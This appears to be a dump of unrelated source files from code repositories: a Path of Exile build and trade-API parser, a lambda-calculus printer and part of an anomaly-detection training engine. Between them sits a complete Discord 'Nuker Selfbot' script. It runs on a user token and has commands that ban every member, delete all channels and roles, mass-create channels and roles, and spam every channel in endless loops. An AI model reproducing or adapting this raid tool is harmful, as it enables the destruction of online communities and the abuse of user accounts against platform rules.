item.cold_max = str(round(cold_mx))
if stats['light max'] or stats['light inc']:
if stats['light max']:
item.lightning_min = stats['light low']
item.lightning_max = stats['light max']
lightning_m = int(ensure_rangeless(item.lightning_min))
lightning_mx = int(ensure_rangeless(item.lightning_max))
lightning_m += lightning_m * (stats['light inc'] / 100)
lightning_mx += lightning_mx * (stats['light inc'] / 100)
item.lightning_min = str(round(lightning_m))
item.lightning_max = str(round(lightning_mx))
if stats['chaos max'] or stats['chaos inc']:
if stats['chaos max']:
item.chaos_min = stats['chaos low']
item.chaos_max = stats['chaos max']
chaos_m = int(ensure_rangeless(item.chaos_min))
chaos_mx = int(ensure_rangeless(item.chaos_max))
chaos_m += chaos_m * (stats['chaos inc'] / 100)
chaos_mx += chaos_mx * (stats['chaos inc'] / 100)
item.chaos_min = str(round(chaos_m))
item.chaos_max = str(round(chaos_mx))
if stats['phys max'] or stats['phys inc']:
physical_m = int(ensure_rangeless(item.physical_min)) + stats['phys low']
physical_mx = int(ensure_rangeless(item.physical_max)) + stats['phys max']
physical_m += physical_m * (stats['phys inc'] / 100)
physical_mx += physical_mx * (stats['phys inc'] / 100)
item.physical_min = str(round(physical_m))
item.physical_max = str(round(physical_mx))
else:
try:
if item.armour:
arm = int(ensure_rangeless(item.armour))
arm += stats['flat armour']
arm += (stats['inc armour'] / 100) * arm
item.armour = str(round(arm))
except Exception:
return
if item.evasion:
ev = int(ensure_rangeless(item.evasion))
ev += stats['flat evasion']
ev += (stats['inc evasion'] / 100) * ev
item.evasion = str(round(ev))
if item.energy_shield:
es = int(ensure_rangeless(item.energy_shield))
es += stats['flat es']
es += (stats['inc es'] / 100) * es
item.energy_shield = str(round(es))
if "shield" in item.tags:
block = int(ensure_rangeless(item.block))
block += stats['block']
item.block = str(round(block))
def _get_wiki_base(item, object_dict, cl, slot, char_api=False, thread_exc_queue=None):
try:
assert item['rarity'].lower()
except Exception:
pass
if item['rarity'].lower() in ['unique', 'relic'] and char_api:
try:
wiki_base = cl.find_items({'name': item['name']})[0]
except IndexError:
ex = AbsentItemBaseException(f"Could not find {item['name']}")
if thread_exc_queue:
thread_exc_queue.put(ex)
return
if not wiki_base:
pass
if isinstance(wiki_base, Weapon):
wiki_base.attack_speed = item.get('attack_speed', 0)
wiki_base.chaos_min = item.get('chaos_min', 0)
wiki_base.chaos_max = item.get('chaos_max', 0)
wiki_base.cold_min = item.get('cold_min', 0)
wiki_base.cold_max = item.get('cold_max', 0)
wiki_base.fire_min = item.get('fire_min', 0)
wiki_base.fire_max = item.get('fire_max', 0)
wiki_base.lightning_min = item.get('lightning_min', 0)
wiki_base.lightning_max = item.get('lightning_max', 0)
wiki_base.physical_min = item.get('physical_min', 0)
wiki_base.physical_max = item.get('physical_max', 0)
wiki_base.range = item.get('range', 0)
wiki_base.critical_chance = item.get('critical_chance', 0)
elif isinstance(wiki_base, Armour):
wiki_base.armour = item.get('armour', 0)
wiki_base.evasion = item.get('evasion', 0)
wiki_base.energy_shield = item.get('energy_shield', 0)
if item['rarity'].lower() == 'relic':
wiki_base.rarity = 'relic'
elif item['rarity'].lower() in ['unique', 'relic']:
real_base = cl.find_items({'name': item['base']})[0]
try:
wiki_base = cl.find_items({'name': item['name']})[0]
except IndexError:
wiki_base = real_base
wiki_base.implicits = item['implicits']
wiki_base.explicits = item['stats']
wiki_base.name = item['name']
wiki_base.base = item['base']
wiki_base.rarity = item['rarity']
if isinstance(wiki_base, Weapon):
wiki_base.attack_speed = real_base.attack_speed
wiki_base.chaos_min = real_base.chaos_min
wiki_base.chaos_max = real_base.chaos_max
wiki_base.cold_min = real_base.cold_min
wiki_base.cold_max = real_base.cold_max
wiki_base.fire_min = real_base.fire_min
wiki_base.fire_max = real_base.fire_max
wiki_base.lightning_min = real_base.lightning_min
wiki_base.lightning_max = real_base.lightning_max
if real_base.physical_min > wiki_base.physical_min:
wiki_base.physical_min = real_base.physical_min
if real_base.physical_max > wiki_base.physical_max:
wiki_base.physical_max = real_base.physical_max
wiki_base.range = real_base.range
wiki_base.critical_chance = real_base.critical_chance
elif isinstance(wiki_base, Armour):
wiki_base.armour = real_base.armour
wiki_base.evasion = real_base.evasion
wiki_base.energy_shield = real_base.energy_shield
if item['rarity'].lower() == 'relic':
wiki_base.rarity = 'relic'
elif "Flask" in item['base']:
return
else:
if item['rarity'].lower() == 'magic' and item['name'] == item['base']:
if '' in item['stats']:
item['stats'].remove('')
item['base'] = get_base_from_magic(item['base'])
wl = []
for w in item['base'].split(' '):
if not any(char.isdigit() for char in w):
wl.append(w)
try:
wiki_base = cl.find_items({'name': ' '.join(wl).replace("Synthesised", "").strip()})[0]
except IndexError:
ex = AbsentItemBaseException(f"Could not find {item['name']}")
if thread_exc_queue:
thread_exc_queue.put(ex)
return
wiki_base.rarity = item['rarity']
wiki_base.name = item['name']
wiki_base.base = item['base']
if char_api:
if item['implicits']:
wiki_base.implicits = '<br>'.join(item['implicits'])
if item['explicits']:
wiki_base.explicits = '<br>'.join(item['explicits'])
else:
try:
pass
except Exception:
pass
if item['implicits']:
wiki_base.implicits = '<br>'.join(item['implicits'])
if item['stats']:
wiki_base.explicits = '<br>'.join(item['stats'])
if item['enchant']:
wiki_base.enchant = item['enchant']
wiki_base.quality = item['quality']
if wiki_base.rarity.lower() not in ['unique', 'relic'] and char_api or char_api is False:
if wiki_base.quality == '' or "ring" in wiki_base.tags or "amulet" in wiki_base.tags \
or "belt" in wiki_base.tags or "quiver" in wiki_base.tags or "flask" in wiki_base.tags \
or "jewel" in wiki_base.tags:
pass
else:
modify_base_stats(wiki_base)
if item['special']:
for influence in item['special']:
if influence == "Shaper Item":
wiki_base.influences.append("shaper")
elif influence == "Elder Item":
wiki_base.influences.append("elder")
elif influence == "Redeemer Item":
wiki_base.influences.append("redeemer")
elif influence == "Crusader Item":
wiki_base.influences.append("crusader")
elif influence == "Warlord Item":
wiki_base.influences.append("warlord")
elif influence == "Hunter Item":
wiki_base.influences.append("hunter")
object_dict[slot] = wiki_base
def parse_pob_xml(xml: str, cl=None):
tree = Etree.ElementTree(Etree.fromstring(xml))
equipped = {}
slots = tree.findall('Items/Slot')
for slot in slots:
if 'socket' in slot.attrib['name'].lower():
continue
equipped[slot.attrib['name']] = {}
equipped[slot.attrib['name']]['id'] = slot.attrib['itemId']
if cl:
obj_dict = {}
threads = []
exc_queue = Queue()
for slot in equipped:
item_id = equipped[slot]['id']
tree_item = tree.find(f'Items/Item[@id="{item_id}"]')
if 'variant' in tree_item.attrib:
lines = tree_item.text.replace('\t', '').split('\n')
for line in lines[:]:
if line.startswith('{variant'):
variant = line.split('variant:')[1][0]
if variant != tree_item.attrib['variant']:
lines.remove(line)
tree_item.text = '\n'.join(lines)
equipped[slot]['raw'] = tree_item.text.replace('\t', '')
try:
equipped[slot]['parsed'] = parse_pob_item(equipped[slot]['raw'])
except Exception:
continue
item = equipped[slot]['parsed']
t = threading.Thread(target=_get_wiki_base, args=(item, obj_dict, cl, slot))
threads.append(t)
t.start()
for thread in threads:
thread.join()
if not exc_queue.empty():
raise exc_queue.get()
for slot in obj_dict:
equipped[slot]['object'] = obj_dict[slot]
skill_slots = tree.findall('Skills/Skill')
for skill in skill_slots:
if 'slot' in skill.attrib:
slot = skill.attrib['slot']
if slot in equipped:
equipped[slot]['gems'] = []
lst = equipped[slot]['gems']
else:
continue
else:
if 'gem_groups' not in equipped:
equipped['gem_groups'] = {}
try:
if not skill.getchildren()[0].attrib['nameSpec'] in equipped['gem_groups']:
equipped['gem_groups'][skill.getchildren()[0].attrib['nameSpec']] = []
except Exception:
continue
lst = equipped['gem_groups'][skill.getchildren()[0].attrib['nameSpec']]
gems = skill.getchildren()
for gem in gems:
gem_d = {
'name': gem.attrib['nameSpec'],
'level': gem.attrib['level'],
'enabled': gem.attrib['enabled'],
'quality': gem.attrib['quality']
}
lst.append(gem_d)
stats = {}
active_spec = int(tree.find('Tree').attrib['activeSpec']) - 1
current_tree = tree.findall('Tree/Spec')[active_spec]
tree_base64 = current_tree.find('URL').text.replace('\t', '').replace('\n', '').rsplit('/', 1)[1]
byte_tree = binascii.a2b_base64(tree_base64.replace('-', '+').replace('_', '/'))
pos = 7
total_nodes = (len(byte_tree) - 7) // 2
nodes = []
for _ in range(total_nodes):
nodes.append(str(int.from_bytes(byte_tree[pos:pos + 2], byteorder='big')))
pos += 2
stats['keystones'] = []
stats['asc_nodes'] = []
for node in nodes:
if node in keystones:
stats['keystones'].append(keystones[node])
if node in asc_nodes:
stats['asc_nodes'].append(asc_nodes[node])
stats['trees'] = {}
for spec in tree.findall('Tree/Spec'):
name = spec.attrib['title'] if 'title' in spec.attrib else 'Default'
stats['trees'][name] = spec.find('URL').text.replace('\t', '').replace('\n', '').replace('/passive', '/fullscreen-passive')
stats['jewels'] = []
jewel_sockets = current_tree.findall('Sockets/Socket')
for socket in jewel_sockets:
if socket.attrib['itemId'] != "0":
item_id = socket.attrib['itemId']
parsed = parse_pob_item(tree.find(f'Items/Item[@id="{item_id}"]').text.replace('\t', ''))
stats['jewels'].append(parsed)
stats['equipped'] = equipped
try:
stats['bandit'] = tree.find('Build').attrib['bandit']
except Exception:
stats['bandit'] = "None"
try:
stats['class'] = tree.find('Build').attrib.get('className', "None")
stats['ascendancy'] = tree.find('Build').attrib.get('ascendClassName', "None")
try:
stats['total_dps'] = tree.find('Build/PlayerStat[@stat="CombinedDPS"]').attrib['value']
except Exception:
stats['total_dps'] = tree.find('Build/PlayerStat[@stat="TotalDPS"]').attrib['value']
stats['level'] = tree.find('Build').attrib['level']
try:
main_group = int(tree.find('Build').attrib.get('mainSocketGroup', 1))
skill_in_group = int(skill_slots[main_group - 1].attrib.get('mainActiveSkill', 1))
stats['main_skill'] = skill_slots[main_group - 1].getchildren()[skill_in_group - 1].attrib['nameSpec']
except Exception:
stats['main_skill'] = " "
stats['crit_chance'] = tree.find('Build/PlayerStat[@stat="PreEffectiveCritChance"]').attrib['value']
stats['effective_crit_chance'] = tree.find('Build/PlayerStat[@stat="CritChance"]').attrib['value']
stats['chance_to_hit'] = tree.find('Build/PlayerStat[@stat="HitChance"]').attrib['value']
stats['str'] = tree.find('Build/PlayerStat[@stat="Str"]').attrib['value']
stats['dex'] = tree.find('Build/PlayerStat[@stat="Dex"]').attrib['value']
stats['int'] = tree.find('Build/PlayerStat[@stat="Int"]').attrib['value']
stats['life'] = tree.find('Build/PlayerStat[@stat="Life"]').attrib['value']
stats['life_regen'] = tree.find('Build/PlayerStat[@stat="LifeRegen"]').attrib['value']
stats['es'] = tree.find('Build/PlayerStat[@stat="EnergyShield"]').attrib['value']
stats['es_regen'] = tree.find('Build/PlayerStat[@stat="EnergyShieldRegen"]').attrib['value']
try:
stats['degen'] = tree.find('Build/PlayerStat[@stat="TotalDegen"]').attrib['value']
except AttributeError:
stats['degen'] = "0"
stats['evasion'] = tree.find('Build/PlayerStat[@stat="Evasion"]').attrib['value']
stats['block'] = tree.find('Build/PlayerStat[@stat="BlockChance"]').attrib['value']
stats['spell_block'] = tree.find('Build/PlayerStat[@stat="SpellBlockChance"]').attrib['value']
stats['dodge'] = tree.find('Build/PlayerStat[@stat="AttackDodgeChance"]').attrib['value']
stats['spell_dodge'] = tree.find('Build/PlayerStat[@stat="SpellDodgeChance"]').attrib['value']
stats['fire_res'] = tree.find('Build/PlayerStat[@stat="FireResist"]').attrib['value']
stats['cold_res'] = tree.find('Build/PlayerStat[@stat="ColdResist"]').attrib['value']
stats['light_res'] = tree.find('Build/PlayerStat[@stat="LightningResist"]').attrib['value']
stats['chaos_res'] = tree.find('Build/PlayerStat[@stat="ChaosResist"]').attrib['value']
try:
stats['power_charges'] = tree.find('Build/PlayerStat[@stat="PowerChargesMax"]').attrib['value']
except Exception:
stats['power_charges'] = '3'
try:
stats['frenzy_charges'] = tree.find('Build/PlayerStat[@stat="FrenzyChargesMax"]').attrib['value']
except Exception:
stats['frenzy_charges'] = '3'
try:
stats['endurance_charges'] = tree.find('Build/PlayerStat[@stat="EnduranceChargesMax"]').attrib['value']
except Exception:
stats['endurance_charges'] = '3'
except AttributeError:
raise OutdatedPoBException()
return stats
def parse_poe_char_api(json, cl, items_only=False):
rarity = {
0: "Normal",
1: "Magic",
2: "Rare",
3: "Unique",
4: "Gem"
}
equipped = {}
threads = []
obj_dict = {}
for item in json['items']:
# TODO: Find a more idiomatic way to do this
# As it is now, this dict should only ever contain values of type `int`
char_item = defaultdict(int)
if items_only and 'Prophecy' in item['icon'] or 'Divination' in item['icon']:
equipped['Item'] = item
continue
char_item['rarity'] = rarity[item['frameType']]
char_item['name'] = item["name"].split('>>')[-1]
if 'properties' in item:
for prop in item['properties']:
if prop['name'] == "Quality":
char_item['quality'] = int(prop['values'][0][0][1:-1])
# Weapon stats
if prop['name'] == "Physical Damage":
char_item['physical_min'] = prop['values'][0][0].split('-')[0]
char_item['physical_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Fire Damage":
char_item['fire_min'] = prop['values'][0][0].split('-')[0]
char_item['fire_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Cold Damage":
char_item['cold_min'] = prop['values'][0][0].split('-')[0]
char_item['cold_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Lightning Damage":
char_item['lightning_min'] = prop['values'][0][0].split('-')[0]
char_item['lightning_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Chaos Damage":
char_item['chaos_min'] = prop['values'][0][0].split('-')[0]
char_item['chaos_max'] = prop['values'][0][0].split('-')[1]
if prop['name'] == "Critical Strike Chance":
char_item['critical_chance'] = prop['values'][0][0]
if prop['name'] == "Attacks per Second":
char_item['attack_speed'] = prop['values'][0][0]
if prop['name'] == "Weapon Range":
char_item['range'] = prop['values'][0][0]
# Armour Stats
if prop['name'] == "Armour":
char_item['armour'] = prop['values'][0][0]
if prop['name'] == "Energy Shield":
char_item['energy_shield'] = prop['values'][0][0]
if prop['name'] == "Evasion":
char_item['evasion'] = prop['values'][0][0]
if char_item['name'] == '':
char_item['name'] = item["typeLine"]
if char_item['rarity'] == "Magic":
char_item['base'] = get_base_from_magic(item['typeLine'])
else:
char_item['base'] = item["typeLine"]
if items_only:
slot = "Item"
elif 'Ring' in item['inventoryId']:
slot = "Ring 2" if "2" in item['inventoryId'] else "Ring 1"
elif item['inventoryId'] == "Offhand":
slot = "Weapon 2"
elif item['inventoryId'] == "Weapon":
slot = "Weapon 1"
elif item['inventoryId'] == "Helm":
slot = "Helmet"
elif item['inventoryId'] == "BodyArmour":
slot = "Body Armour"
elif item['inventoryId'] == "Flask":
slot = f"Flask {int(item['x']) + 1}"
char_item['name'] = item["typeLine"].split('>>')[-1]
if item['frameType'] == 1 and 'Flask of' in char_item['name']:
char_item['rarity'] = "Magic"
elif item['inventoryId'] in ['Amulet', 'Helm', 'Gloves', 'Belt', 'Flask', 'Boots', 'Weapon', 'PassiveJewels']:
slot = item['inventoryId']
else:
continue
if 'implicitMods' in item:
char_item['implicits'] = item['implicitMods']
else:
char_item['implicits'] = []
if 'explicitMods' in item:
char_item['explicits'] = item['explicitMods']
else:
char_item['explicits'] = []
if 'craftedMods' in item:
for mod in item['craftedMods']:
# FIXME: unresolved attribute
char_item['explicits'].append("{crafted}"f"{mod}")
if 'corrupted' in item:
# FIXME: unresolved attribute
char_item['explicits'].append('Corrupted')
if 'enchantMods' in item:
char_item['implicits'] = ["{crafted}" + item['enchantMods'][0]]
equipped[slot] = {}
if slot == 'PassiveJewels' or items_only:
if type(equipped[slot]) is dict:
equipped[slot] = []
equipped[slot].append(char_item)
else:
equipped[slot] = char_item
if 'socketedItems' in item and not items_only:
equipped[slot]['gems'] = []
for socketed in item['socketedItems']:
if socketed['frameType'] == 4:
gem_d = {'name': socketed['typeLine']}
for prop in socketed['properties']:
if prop['name'] == 'Quality':
gem_d['quality'] = prop['values'][0][0].replace('+', '').replace('%', '')
if prop['name'] == 'Level':
gem_d['level'] = prop['values'][0][0]
if 'quality' not in gem_d:
gem_d['quality'] = 0
equipped[slot]['gems'].append(gem_d)
if slot != 'PassiveJewels' and 'Flask' not in slot:
t = threading.Thread(target=_get_wiki_base, args=(char_item, obj_dict, cl, slot, True))
threads.append(t)
t.start()
for thread in threads:
thread.join()
if items_only:
equipped["items_objects"] = []
for slot in obj_dict:
if not items_only:
equipped[slot]['object'] = obj_dict[slot]
else:
equipped["items_objects"] = obj_dict[slot]
stats = {'equipped': equipped}
if 'character' in json:
stats['level'] = json['character']['level']
stats['ascendancy'] = json['character']['ascendancyClass']
stats['class'] = json['character']['class']
stats['charname'] = json['character']['name']
stats['league'] = json['character']['league']
return stats
def get_base_from_magic(name: str):
return ' '.join(name.split("of")[0].split("'")[-1].split()[1:])
def poe_skill_tree(hashes, asc: str = "None", return_keystones=False, return_asc=False):
char = {
"marauder": 1,
"ranger": 2,
"witch": 3,
"duelist": 4,
"templar": 5,
"shadow": 6,
"scion": 7
}
ascendancy_bytes = {
"marauder": {
"none": 0,
"juggernaut": 1,
"berserker": 2,
"chieftain": 3
},
"ranger": {
"none": 0,
"raider": 1,
"deadeye": 2,
"pathfinder": 3
},
"witch": {
"none": 0,
"occultist": 1,
"elementalist": 2,
"necromancer": 3
},
"duelist": {
"none": 0,
"slayer": 1,
"gladiator": 2,
"champion": 3
},
"templar": {
"none": 0,
"inquisitor": 1,
"hierophant": 2,
"guardian": 3
},
"shadow": {
"none": 0,
"assassin": 1,
"trickster": 2,
"saboteur": 3
},
"scion": {
"none": 0,
"ascendant": 1
}
}
# This took me a real assload of time to figure out
# Either the 4th only or the first 4 bytes represent tree/b64 format version on poe side
# 5th and 6th byte are character class and ascendancy respectively
# Not sure if 7th byte should inherently be 0, but I think its related to start/exit nodes
ba = bytearray([0, 0, 0, 4])
char_class = None
asc = asc.lower()
for a_char in ascendancy_bytes:
if asc in ascendancy_bytes[a_char]:
char_class = a_char
break
if not char_class:
char_class = asc
asc = "none"
ba += bytes([char[char_class]])
ba += bytes([ascendancy_bytes[char_class][asc.lower()]])
ba += bytes([0])
for hash_obj in hashes:
ba += hash_obj.to_bytes(2, 'big')
post = binascii.b2a_base64(ba).decode().replace('+', '-').replace('/', '_')
tree_keystones = []
ascendancy = []
for hash_obj in hashes:
if str(hash_obj) in keystones:
tree_keystones.append(keystones[str(hash_obj)])
if str(hash_obj) in asc_nodes:
ascendancy.append(asc_nodes[str(hash_obj)])
if return_keystones and return_asc:
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}", tree_keystones, ascendancy
elif return_keystones and not return_asc:
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}", tree_keystones
elif return_asc:
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}", ascendancy
return f"https://www.pathofexile.com/fullscreen-passive-skill-tree/{post}"
def get_active_leagues():
http = urllib3.PoolManager()
resp = http.request('GET', 'https://www.pathofexile.com/api/trade/data/leagues')
if resp.status != 200:
raise RequestException(resp.data.decode('utf-8'))
leagues = js.loads(resp.data.decode('utf-8'))
return leagues['result']
def _trade_api_query(data, league, endpoint):
http = urllib3.PoolManager()
print(js.dumps(data).encode('utf-8'))
resp = http.request(
'POST', f'https://www.pathofexile.com/api/trade/{endpoint}/{league}',
body=js.dumps(data).encode('utf-8'), headers={'Content-Type': 'application/json'}
)
if resp.status != 200:
raise RequestException(resp.data.decode('utf-8'))
json_result = js.loads(resp.data.decode('utf-8'))
listing_ids = json_result['result']
entries = http.request('GET', f'https://www.pathofexile.com/api/trade/fetch/{",".join(listing_ids[:10])}')
if entries.status != 200:
raise RequestException(entries.data.decode('utf-8'))
return js.loads(entries.data.decode('utf-8'))['result']
def currency_rates(have: str, want: str, league: str):
data = {
"exchange": {
"status": {
"option": "online"
},
"have": [have],
"want": [want]
}
}
listings = _trade_api_query(data, league, 'exchange')
return CurrencyQuery(have, want, league, listings)
def item_price(item, league):
data = {
"query": {
"term": item,
"status": {
"option": "online"
}
},
"sort": {
"price": "asc"
},
}
listings = _trade_api_query(data, league, 'search')
return ItemPriceQuery(item, league, listings)
``` |
{
"source": "JokerThy/Discord-Selfot",
"score": 3
} |
#### File: JokerThy/Discord-Selfot/herelol.py
```python
import discord
from discord.ext import commands
import asyncio
import random
import os
##Bot Sup##
prefix = input("Enter A Prefix: ")
token = input("Enter Your Token: ")
spam = input("Enter A Spam Message: ")
channel = input("Enter Channel Names: ")
roles = input("Enter Role Names: ")
##Setup Finished##
client = commands.Bot(command_prefix=prefix, case_insensitive=True, self_bot=True)
client.remove_command(name="help")
os.system('cls' if os.name == 'nt' else 'clear')
@client.event
async def on_ready():
print(f'''
______ ______ ______ __ __ __ __ __ ______ __
/\__ _\ /\ ___\ /\ == \ /\ "-./ \ /\ \ /\ "-.\ \ /\ __ \ /\ \
\/_/\ \/ \ \ __\ \ \ __< \ \ \-./\ \ \ \ \ \ \ \-. \ \ \ __ \ \ \ \____
\ \_\ \ \_____\ \ \_\ \_\ \ \_\ \ \_\ \ \_\ \ \_\\"\_\ \ \_\ \_\ \ \_____\
\/_/ \/_____/ \/_/ /_/ \/_/ \/_/ \/_/ \/_/ \/_/ \/_/\/_/ \/_____/
------------------------------------------------------------------ Nuker Selfbot Is Online <$
''')
@client.command()
async def destroy(ctx):
for channel in ctx.guild.channels:
await channel.delete()
@client.command(pass_context=True)
async def help(ctx):
await ctx.message.delete()
embed = discord.Embed(color=000000, timestamp=ctx.message.created_at)
embed.set_author(name=" 🌠Terminal Nuker")
embed.add_field(name="{prefix}flood", value="```Spams the same message in every channel!``` 🔱")
embed.add_field(name="{prefix}spam {amount} {message}", value="```spams the message how much times you want in a single channel```🔱")
embed.add_field(name="{prefix}destroy", value="```Deletes all the channels in the guild```🔱")
embed.add_field(name="{prefix}roles", value="```Deletes all the roles, and makes new roles!```🔱")
embed.add_field(name="{prefix}flood", value="```Floods the channels with pings!```🔱")
embed.add_field(name="{prefix}nuke", value="```This will delete all channels and roles, and make new roles and channels and will spam inside every channel.```🔱")
embed.set_image(url="")
await ctx.send(embed=embed)
@client.command()
async def flood(ctx):
guild = ctx.message.guild
await ctx.message.delete()
await ctx.send("`selfbot is now spamming!`")
while True:
for channel in guild.text_channels:
await channel.send({spam})
@client.command()
async def roles(ctx):
guild = ctx.message.guild
for role in guild.roles:
try:
await role.delete()
print("Roles have been deleted")
except:
pass
print("Roles could not be deleted")
for i in range(250):
try:
await guild.create_role(name=roles)
print("Role has been created")
except:
print("Role could not be created")
pass
@client.command(pass_context=True)
async def nuke(ctx):
await ctx.message.delete()
guild = ctx.message.guild
print("ENTERING: Banning members")
for member in list(ctx.message.guild.members):
try:
await guild.ban(member)
print("User" +member.name + "Has Been Banned")
except:
pass
await ctx.send("`Banned all!`")
#deleting channels
print("ENTERING: Deleting channels")
try:
for channel in ctx.guild.channels:
await channel.delete()
print("Channel deleted")
except:
pass
print("Channel could not be deleted")
#creating channels
print("ENTERING: Creating channels")
try:
for i in range(250):
guild = ctx.message.guild
await guild.create_text_channel(channels)
print("Channel created")
except:
pass
print("Channel could not be created")
print("ENTERING: Spamming messages")
while True:
for channel in guild.text_channels:
await channel.send(spam)
@client.command()
async def spam(ctx, amount:int=None, *, message: str=None):
await ctx.message.delete()
try:
if amount is None or message is None:
await ctx.send(f"Usage: `{ctx.prefix}spam <amount> <message>`")
else:
for each in range (0, amount):
await ctx.send(f"{message}")
except Exception as e:
await ctx.send(f"Error: {e}")
client.run(token, bot=False)
``` |
{
"source": "Joker-vD/onepass-lambda-compiler",
"score": 4
} |
#### File: Joker-vD/onepass-lambda-compiler/olc_ast.py
```python
def lam(param, body):
return ('LAM', param, body)
def app(fun, arg):
return ('APP', fun, arg)
# No idea who invented this trick first, I've seen it in the code accompanying <NAME>'s TAPL;
# basically, you kinda track what priority level the expression you're about to print has, and put parens
# around it if it's low enough to need it. Here, level 0 is "either top or a body of a lambda", level 1 is
# "lhs of the application", and level 2 is "rhs of an application". Variables never need parens, lambdas
# need parens if they're being applied from whatever side, and applications need parens only when they're
# on the rhs of another application
def lam2str(term, level=0):
if isinstance(term, str):
return term
kind, car, cdr = term
if kind == 'LAM':
result = f'λ{car}. {lam2str(cdr, 0)}'
if level > 0:
result = f'({result})'
return result
if kind == 'APP':
result = f'{lam2str(car, 1)} {lam2str(cdr, 2)}'
if level > 1:
result = f'({result})'
return result
raise Exception(f'not a lambda term: {term}')
``` |
{
"source": "JokerWDL/PyAnomaly",
"score": 3
} |
#### File: core/engine/default_engine.py
```python
import torch
from lib.core.utils import AverageMeter
from .utils import engine_save_checkpoint
from .utils import engine_save_model
from .abstract import AbstractTrainer, AbstractInference
class DefaultTrainer(AbstractTrainer):
''' __init__ template
the inf trainer
'''
def __init__(self, *defaults, **kwargs):
'''
Args:
defaults(tuple): the default will have:
0->model: the model of the experiment
1->train_dataloader: the dataloader
2->val_dataloader: the dataloader
3->optimizer: the optimizer of the network
4->loss_function: the loss function of the model
5->logger: the logger of the whole training process
6->config: the config object of the whole process
kwargs(dict): the default will have:
verbose(str):
parallel(bool): True-> data parallel
pertrain(bool): True-> use the pretarin model
'''
# logger & config
self.logger = defaults[5]
self.config = defaults[6]
# basic things
if kwargs['parallele']:
self.model = self.data_parallel(defaults[0])
else:
self.model = defaults[0].cuda()
if kwargs['pretrain']:
self.load_pretrain()
self.train_dataloader = defaults[1]
self.val_dataloader = defaults[2]
self.optimizer = defaults[3]
self.loss_function = defaults[4]
# basic meter
self.batch_time = AverageMeter()
self.data_time = AverageMeter()
self.loss_basic = AverageMeter()
# others
self.verbose = kwargs['verbose']
self.accuarcy = 0.0 # to store the accuracy varies from epoch to epoch
self.kwargs = kwargs
self.result_path = '.'
self.log_step = 5 # how many steps to print the information
self.eval_step = 5 # how many steps to use the val dataset to test the model
self.save_step = 5
if self.config.RESUME.flag:
self.resume()
if self.config.FINETUNE.flag:
self.fine_tune()
def load_pretrain(self):
model_path = self.config.MODEL.pretrain_model
if model_path is '':
self.logger.info('=>Not have the pre-train model! Training from the scratch')
else:
self.logger.info('=>Loading the model in {}'.format(model_path))
pretrain_model = torch.load(model_path)
if 'epoch' in pretrain_model.keys():
self.logger.info('(|_|) ==> Use the check point file')
self.model.load_state_dict(pretrain_model['model_state_dict'])
else:
self.logger.info('(+_+) ==> Use the model file')
self.model.load_state_dict(pretrain_model['state_dict'])
def resume(self):
self.logger.info('=> Resume the previous training')
checkpoint_path = self.config.RESUME.checkpoint_path
self.logger.info('=> Load the checkpoint from {}'.format(checkpoint_path))
checkpoint = torch.load(checkpoint_path)
self.model.load_state_dict(checkpoint['model_state_dict'])
self.optimizer.load_state_dict(checkpoint['optimizer_state_dict'])
def fine_tune(self):
layer_list = self.config.FINETUNE.layer_list
self.logger.info('=> Freeze layers except start with:{}'.format(layer_list))
for n, p in self.model.named_parameters():
parts = n.split('.')
# consider the data parallel situation
if parts[0] == 'module':
if parts[1] not in layer_list:
p.requires_grad = False
if p.requires_grad:
print(n)
else:
if parts[0] not in layer_list:
p.requires_grad = False
if p.requires_grad:
print(n)
self.logger.info('Finish Setting freeze layers')
def data_parallel(self, model):
'''
Data parallel the model
'''
self.logger.info('<!_!> ==> Data Parallel')
gpus = [int(i) for i in range(self.config.SYSTEM.num_gpus)]
model_parallel = torch.nn.DataParallel(model.cuda(), device_ids=gpus)
return model_parallel
'''
Run the whole process:
1. print the log information ( before_step)
2. execute training process (train)
3. evaluate(including the validation and test) -
| --> (after_step)
4. save model -
'''
def before_step(self, current_step):
pass
def after_step(self, current_step):
# acc = 0.0
for h in self._hooks:
h.after_step(current_step)
if (current_step % self.eval_step != 0) or current_step == 0:
self.mini_eval(current_step)
return
def after_train(self):
for h in self._hooks:
h.after_train()
self.save(self.config.TRAIN.max_steps)
def save(self, current_epoch, best=False):
'''
self.saved_model: is the model or a dict of combination of models
self.saved_optimizer: is the optimizer or a dict of combination of optimizers
self.saved_loss: the loss or a dict of the combination of loss
'''
if best:
engine_save_checkpoint(self.config, self.kwargs['config_name'], self.saved_model, current_epoch, self.saved_loss, self.saved_optimizer, self.logger, self.kwargs['time_stamp'], self.accuarcy, flag='best', verbose=(self.kwargs['model_type'] + '#' + self.verbose),best=best)
self.result_path = engine_save_model(self.config, self.kwargs['config_name'], self.saved_model, self.logger, self.kwargs['time_stamp'], self.accuarcy, verbose=(self.kwargs['model_type'] + '#' + self.verbose), best=best)
else:
engine_save_checkpoint(self.config, self.kwargs['config_name'], self.saved_model, current_epoch, self.saved_loss, self.saved_optimizer, self.logger, self.kwargs['time_stamp'], self.accuarcy, verbose=(self.kwargs['model_type'] + '#' + self.verbose), best=best)
def train(self,current_step):
raise Exception('Need to implement the train function!!')
def evaluate(self, current_step):
'''
Evaluate the results of the model
!!! Will change, e.g. accuracy, mAP.....
!!! Or can call other methods written by the official
Returns:
metric: the metric
'''
raise Exception('Need to implement the evaluation function, return the score')
class DefaultInference(AbstractInference):
'''__init__ template
'''
def __init__(self, *defaults,**kwargs):
'''
Args:
defaults(tuple): the default will have:
0->model: the model of the experiment
1->model_path: the path of the model path
2->val_dataloader: the dataloader to inference
3->logger: the logger of the whole process
4->config: the config object of the whole process
kwargs(dict): the default will have:
verbose(str):
parallel(bool): True-> data parallel
pertrain(bool): True-> use the pretarin model
mode(str): 'dataset' -> the data will use the dataloder to pass in(dicard, becasue we will use the dataset to get all I need)
'''
self.logger = defaults[3]
self.config = defaults[4]
self.model_path = defaults[1]
if kwargs['parallel']:
self.model = self.data_parallel(defaults[0])
else:
self.model = defaults[0]
self.load()
self.verbose = kwargs['verbose']
self.kwargs = kwargs
self.mode = kwargs['mode']
self.metric = 0.0
def load(self):
if type(self.model) == type(dict()):
for k, v in self.model.items():
temp = torch.load(self.model_path)
if k[0] == 'F':
continue
